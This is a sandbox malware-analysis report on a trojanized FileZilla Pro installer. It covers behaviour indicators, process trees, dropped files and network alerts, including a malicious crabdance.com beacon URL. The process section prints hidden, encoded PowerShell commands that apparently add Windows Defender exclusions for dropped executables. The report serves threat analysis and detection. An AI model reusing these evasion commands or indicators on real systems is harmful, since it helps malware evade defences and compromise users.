File name:

FileZilla Pro 3.69.1 (x86).exe

Full analysis: https://app.any.run/tasks/c5f98cf7-c486-4fa5-96ef-fe463a56472b
Verdict: Malicious activity
Analysis date: April 29, 2025, 13:14:43
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
advancedinstaller
phishing
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 7 sections
MD5:

00D766FD0F7BCF3858AA2D7D3FD540B9

SHA1:

B9C0305E9F4147AE319F4F690DECEB5FE23579FD

SHA256:

7F401672FDE74E85AA1F32B9DD6A523144363250483AB02859F2FE3946C15663

SSDEEP:

196608:k29p9hWlVJWlbJnUZi+cEt5NfthAbcwvuJQEady2E:x9pjWlV4b56TcEtDtS5HE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • s.exe (PID: 7700)
    • Registers / Runs the DLL via REGSVR32.EXE

      • s.exe (PID: 7700)
    • Changes powershell execution policy (Bypass)

      • msiexec.exe (PID: 2692)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 1568)
      • powershell.exe (PID: 8140)
      • powershell.exe (PID: 1188)
      • powershell.exe (PID: 7308)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2196)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8140)
      • powershell.exe (PID: 1568)
      • powershell.exe (PID: 1188)
      • powershell.exe (PID: 7308)
  • SUSPICIOUS

    • ADVANCEDINSTALLER mutex has been found

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • Reads the Windows owner or organization settings

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7424)
    • Executable content was dropped or overwritten

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
      • powershell.exe (PID: 6388)
      • VC_redist.x64.exe (PID: 7400)
      • VC_redist.x86.exe (PID: 7824)
      • dotNetFx46_Full_setup.exe (PID: 6760)
      • Value.exe (PID: 7700)
      • CanReuseTransform.exe (PID: 7236)
    • Process drops legitimate windows executable

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • The process creates files with name similar to system file names

      • s.exe (PID: 7700)
    • Reads security settings of Internet Explorer

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • VC_redist.x64.exe (PID: 7400)
    • Detects AdvancedInstaller (YARA)

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • There is functionality for taking screenshot (YARA)

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
    • Creates/Modifies COM task schedule object

      • s.exe (PID: 7700)
      • regsvr32.exe (PID: 896)
    • Malware-specific behavior (creating "System.dll" in Temp)

      • s.exe (PID: 7700)
    • Creates a software uninstall entry

      • s.exe (PID: 7700)
    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 2692)
    • The process hide an interactive prompt from the user

      • msiexec.exe (PID: 2692)
    • The process bypasses the loading of PowerShell profile settings

      • msiexec.exe (PID: 2692)
    • The process executes Powershell scripts

      • msiexec.exe (PID: 2692)
    • Executing commands from a ".bat" file

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • Application launched itself

      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
    • The process executes via Task Scheduler

      • powershell.exe (PID: 8140)
      • Value.exe (PID: 7700)
      • powershell.exe (PID: 1188)
      • Value.exe (PID: 6048)
      • powershell.exe (PID: 1568)
      • CanReuseTransform.exe (PID: 7236)
      • powershell.exe (PID: 7308)
    • Connects to unusual port

      • RegSvcs.exe (PID: 6416)
  • INFO

    • Reads the computer name

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7516)
      • msiexec.exe (PID: 7424)
      • msiexec.exe (PID: 3900)
      • s.exe (PID: 7700)
      • msiexec.exe (PID: 2692)
      • msiexec.exe (PID: 4452)
      • VC_redist.x64.exe (PID: 7400)
      • VC_redist.x86.exe (PID: 7824)
      • info.exe (PID: 7628)
    • Checks supported languages

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7516)
      • msiexec.exe (PID: 7424)
      • msiexec.exe (PID: 3900)
      • s.exe (PID: 7700)
      • msiexec.exe (PID: 4452)
      • msiexec.exe (PID: 2692)
      • info.exe (PID: 7628)
      • VC_redist.x64.exe (PID: 7400)
      • VC_redist.x86.exe (PID: 7824)
    • Reads Environment values

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7516)
      • msiexec.exe (PID: 4452)
      • msiexec.exe (PID: 2692)
    • The sample compiled with english language support

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
      • msiexec.exe (PID: 7424)
    • Create files in a temporary directory

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
      • VC_redist.x64.exe (PID: 7400)
      • powershell.exe (PID: 6388)
    • Process checks computer location settings

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • VC_redist.x64.exe (PID: 7400)
    • Creates files in the program directory

      • s.exe (PID: 7700)
    • Reads the software policy settings

      • powershell.exe (PID: 6388)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 7424)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6388)
    • Reads the machine GUID from the registry

      • VC_redist.x86.exe (PID: 7824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (18)
.exe | Win32 Executable (generic) (2.9)
.exe | Generic Win/DOS Executable (1.3)
.exe | DOS Executable Generic (1.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:03 13:51:40+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.43
CodeSize: 2920960
InitializedDataSize: 1194496
UninitializedDataSize: -
EntryPoint: 0x2351b0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: Debug
FileOS: Win32
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: GetintoWAY
FileDescription: FileZilla Pro 3.69.1 (x86) Installer
FileVersion: 0.0.0.0
InternalName: FileZilla Pro 3.69.1 (x86)
LegalCopyright: Copyright (C) 2025 GetintoWAY
OriginalFileName: FileZilla Pro 3.69.1 (x86).exe
ProductName: FileZilla Pro 3.69.1 (x86)
ProductVersion: 0.0.0.0
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
176
Monitored processes
43
Malicious processes
3
Suspicious processes
9

Behavior graph

Click at the process to see the details
start filezilla pro 3.69.1 (x86).exe msiexec.exe msiexec.exe no specs s.exe regsvr32.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs powershell.exe conhost.exe no specs vc_redist.x64.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs attrib.exe no specs attrib.exe no specs attrib.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs info.exe conhost.exe no specs #PHISHING svchost.exe vc_redist.x86.exe powershell.exe no specs conhost.exe no specs slui.exe dotnetfx46_full_setup.exe powershell.exe no specs conhost.exe no specs value.exe powershell.exe no specs conhost.exe no specs value.exe no specs regsvcs.exe canreusetransform.exe powershell.exe no specs conhost.exe no specs filezilla pro 3.69.1 (x86).exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
896"C:\WINDOWS\system32\regsvr32.exe" /s "C:\Program Files (x86)\FileZilla Pro\fzshellext_64.dll"C:\Windows\System32\regsvr32.exes.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft(C) Register Server
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1188"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAGQALQBNAHAAUABSAEUARgBlAFIAZQBuAEMAZQAgAC0ARQB4AEMATABVAHMASQBvAE4AUABBAHQAaAAgAEMAOgBcAFcASQBOAEQATwBXAFMAXABzAHkAcwB0AGUAbQAzADIAXABjAG8AbgBmAGkAZwBcAHMAeQBzAHQAZQBtAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFMAYQBmAGUAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFYAYQBsAHUAZQAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVwBJAE4ARABPAFcAUwBcAFQARQBNAFAAXAAgAC0ARgBPAHIAYwBlADsAIABhAEQARAAtAG0AcABQAHIARQBmAGUAcgBFAG4AQwBlACAALQBFAFgAQwBsAFUAUwBJAG8AbgBQAFIAbwBDAEUAcwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFcASQBOAEQATwBXAFMAXABzAHkAcwB0AGUAbQAzADIAXABjAG8AbgBmAGkAZwBcAHMAeQBzAHQAZQBtAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFMAYQBmAGUAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFYAYQBsAHUAZQAuAGUAeABlACAALQBGAG8AUgBjAGUAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1568"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAHAAcABSAEUARgBFAHIAZQBOAEMAZQAgAC0AZQBYAEMAbABVAFMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUwBhAGYAZQBXAGEAaQB0AEgAYQBuAGQAbABlAFwAVgBhAGwAdQBlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBDAGUAOwAgAEEAZABEAC0ATQBQAFAAcgBFAEYARQBSAEUATgBDAEUAIAAtAEUAWABDAEwAVQBTAGkAbwBOAFAAUgBvAEMARQBTAFMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABTAGEAZgBlAFcAYQBpAHQASABhAG4AZABsAGUAXABWAGEAbAB1AGUALgBlAHgAZQAgAC0ARgBPAFIAQwBFAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1912C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\EXE76DB.bat" "C:\Windows\SysWOW64\cmd.exeFileZilla Pro 3.69.1 (x86).exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2692C:\Windows\syswow64\MsiExec.exe -Embedding 1C74A9B652D9A33968471B2E617F6227 E Global\MSI0000C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
3900C:\Windows\syswow64\MsiExec.exe -Embedding 78F4B332C0643D969549C933A613C254 CC:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
4400\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4452C:\Windows\syswow64\MsiExec.exe -Embedding D6697974D98126E5162921C1EC4F48BBC:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
5576\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
31 193
Read events
31 100
Write events
84
Delete events
9

Modification events

(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\FileZilla Pro
Operation:writeName:Version
Value:
3.69.1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\FileZilla Pro
Operation:writeName:Package
Value:
1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\FileZilla Pro
Operation:writeName:Updated
Value:
0
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:UninstallString
Value:
"C:\Program Files (x86)\FileZilla Pro\uninstall.exe"
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:InstallLocation
Value:
C:\Program Files (x86)\FileZilla Pro
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:DisplayName
Value:
FileZilla Pro 3.69.1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:DisplayIcon
Value:
C:\Program Files (x86)\FileZilla Pro\FileZilla.exe
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:DisplayVersion
Value:
3.69.1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:URLInfoAbout
Value:
https://filezilla-project.org/
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:URLUpdateInfo
Value:
https://filezilla-project.org/
Executable files
59
Suspicious files
142
Text files
732
Unknown types
0

Dropped files

PID
Process
Filename
Type
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\FileZilla Pro.msi
MD5:
SHA256:
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\MSICF97.tmpexecutable
MD5:2330EBBE491C6026AF5E8853F3692798
SHA256:3ADA2257732FAE73114BB6A5E082CEF4BD72C3D6842924BE6F22728C7D7CACC4
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\holder0.aiphbinary
MD5:0A0B3892D3BE447FE6F8C135918294DE
SHA256:DA15FBC5965F11F8D75A513BA05AB0B9CBB49E4A24F66BA965A8029B9C61C114
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\shiCF29.tmpexecutable
MD5:84A34BF3486F7B9B7035DB78D78BDD1E
SHA256:F85911C910B660E528D2CF291BAA40A92D09961996D6D84E7A53A7095C7CD96E
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\MSID101.tmpexecutable
MD5:2330EBBE491C6026AF5E8853F3692798
SHA256:3ADA2257732FAE73114BB6A5E082CEF4BD72C3D6842924BE6F22728C7D7CACC4
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\tabbackbinary
MD5:4C3DDA35E23D44E273D82F7F4C38470A
SHA256:E728F79439E07DF1AFBCF03E8788FA0B8B08CF459DB31FC8568BC511BF799537
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\Upimage
MD5:FD64F54DB4CBF736A6FC0D7049F5991E
SHA256:C269353D19D50E2688DB102FEF8226CA492DB17133043D7EB5420EE8542D571C
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\cmdlinkarrowimage
MD5:983358CE03817F1CA404BEFBE1E4D96A
SHA256:7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\MSID121.tmpexecutable
MD5:C9EF0378879C57A38C075BB28B88FCAB
SHA256:6E7CDAB18E1F705C0EA56A565577DB0389ECE2B5A4E0F31D3063E9103F59FBEE
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\dialog.jpgimage
MD5:5F6253CFF5A8B031BFB3B161079D0D86
SHA256:36D9BAB35D1E4B50045BF902F5D42B6F865488C75F6E60FC00A6CD6F69034AB0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
26
DNS requests
19
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.147:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
8120
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
8120
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7628
info.exe
GET
200
82.115.223.212:80
http://stats-1.crabdance.com/api/record?t=a10
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
23.48.23.147:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.147
  • 23.48.23.155
  • 23.48.23.176
  • 23.48.23.174
  • 23.48.23.153
  • 23.48.23.191
  • 23.48.23.140
  • 23.48.23.177
  • 23.48.23.164
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
google.com
  • 142.250.186.46
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.4
  • 40.126.32.72
  • 20.190.160.5
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.74
  • 20.190.160.67
  • 20.190.160.132
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted
lofhr.com
  • 185.208.156.66
unknown

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.crabdance .com Domain
2196
svchost.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Suspected Phishing Domain ( .crabdance .com)
7628
info.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
7628
info.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS HTTP Request to a *.crabdance .com Domain
7628
info.exe
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
7628
info.exe
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
No debug info